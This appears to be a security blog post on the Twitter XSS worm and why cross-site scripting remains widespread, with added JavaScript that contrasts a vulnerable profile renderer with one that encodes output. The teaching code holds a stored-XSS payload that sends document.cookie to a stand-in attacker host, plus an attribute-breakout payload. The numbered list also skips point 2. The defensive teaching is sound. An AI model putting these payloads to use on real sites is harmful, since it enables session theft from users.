We Used To Laugh At XSS
Last weekend, a web-based Twitter worm (aka the Mikeyy/StalkDaily worm) hit the media. It was the work of Michael Mooney, a 17-year-old, self-described 'bored developer', who was brazen enough to brag about the attacks after the fact. He may be regretting the publicity at this point, now that his systems have been publicly hacked and he's no doubt heard about how Samy Kamkar was rewarded for his efforts after a similar attack on MySpace with a felony conviction. However, thus far it seems to have landed him a job as opposed to jail time.
What has happened to turn XSS from amusing interweb trickery into a valuable attack vector? In short, the web has changed, but unfortunately security is lagging behind. In general, I see the following four factors that deserve credit:
1.) Prevention [should be] the best Medicine - We've known about the dangers of XSS for at least a decade now, and yet it remains the most prevalent web application vulnerability out there. Efforts to educate developers have produced limited results, not in my opinion because developers don't care, but because the population of web developers is growing at a tremendous pace, thanks to point 'n click development environments. We've empowered millions with the tools to develop web applications, but we've also made it far too easy to produce an insecure application.
3.) The Power of Social Networking - Web based worms such as the Twitter worm have one inherent limitation - they live within the ecosystem where they were created. While this would be significant for a seldom used web application, with social networking sites measuring active users in the hundreds of millions this is hardly a limitation at all.
4.) Sky's the limit - While we tend to think of XSS as a way to steal session credentials, such attacks are limited only by the creativity of the researchers/attackers that pursue them. Anton Rager developed XSS-Proxy as a means to remotely control XSS attacks. Billy Hoffman turned a browser into a vulnerability scanner via XSS. Jeremiah Grossman demonstrated gaining insight into someone's browser history, and at Black Hat DC this year I talked about how XSS can be used to conduct client-side SQL injection. The list goes on and on...
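To make point 1 concrete, here is the stored-XSS pattern behind profile-field worms and the fix for it. This is an added example, not code from the original post or from any of the sites mentioned: a vulnerable renderer that concatenates a user's saved profile into markup, beside a hardened renderer that encodes each value for the context it lands in (HTML text, double-quoted attribute, URL). The attacker profile and the crude `containsActiveContent` checker are constructed for illustration only; the second payload shows why encoding matters even when angle brackets never appear.

```javascript
// Added example (not from the original post). Constructed attacker profile:
// the attacker saves this once, and the site renders it for every visitor.
const attackerProfile = {
  name: 'mikeyy',
  // Payload 1: breaks out of the text context with a script tag.
  bio: '<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
  // Payload 2: breaks out of a double-quoted attribute without any angle
  // brackets, adding an event handler to the link.
  website: 'http://example.com" onmouseover="alert(1)',
};

// VULNERABLE: untrusted data concatenated straight into markup.
function renderProfileVulnerable(p) {
  return `<h2>${p.name}</h2>` +
         `<p class="bio">${p.bio}</p>` +
         `<a href="${p.website}">homepage</a>`;
}

// Encoder for HTML text and double-quoted attribute contexts: replaces the
// five characters that can change the meaning of the surrounding markup.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// A URL context needs more than encoding: refuse anything that does not
// parse as http(s). Malformed input (like payload 2) fails to parse and is
// replaced with a harmless fragment link.
function safeUrl(u) {
  try {
    const parsed = new URL(String(u));
    if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return '#';
    return parsed.href;
  } catch (e) {
    return '#';
  }
}

// HARDENED: the same template, with every untrusted value encoded for its
// context. The markup is the developer's; only the data is escaped.
function renderProfileSafe(p) {
  return `<h2>${encodeHtml(p.name)}</h2>` +
         `<p class="bio">${encodeHtml(p.bio)}</p>` +
         `<a href="${encodeHtml(safeUrl(p.website))}">homepage</a>`;
}

// Demo-only heuristic (not a real XSS detector): does the rendered HTML
// still contain a script tag or an injected on*= event-handler attribute?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /\son[a-z]+\s*=/i.test(html);
}

console.log('vulnerable:', renderProfileVulnerable(attackerProfile));
console.log('hardened:  ', renderProfileSafe(attackerProfile));
```

The hardened version is what "prevention" looks like in practice: the fix is not a blacklist of bad strings in the input, but encoding at the output sink for each context. Note that the URL field needs scheme validation on top of encoding, because `javascript:` is perfectly well-formed attribute text once encoded.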
The Twitter and MySpace worms were largely benign. When traditional worms began spreading, they were largely benign as well, a proof of concept to prove that something could be done. Once that hurdle had been overcome, criminals moved in to profit and I don't expect the outcome to be any different this time around either.
We've set the bar far too low for attackers. Well known vulnerabilities such as XSS remain far too prevalent, despite having been around for years. It's encouraging to see Microsoft stepping into the fray by adding XSS prevention to Internet Explorer 8 and I hope that other browser vendors will do the same. While the root cause lies with web app developers, it is clear that focusing on developers alone will not fix the problem. The interconnected nature of the web requires that all players pitch in to reduce risk to end users.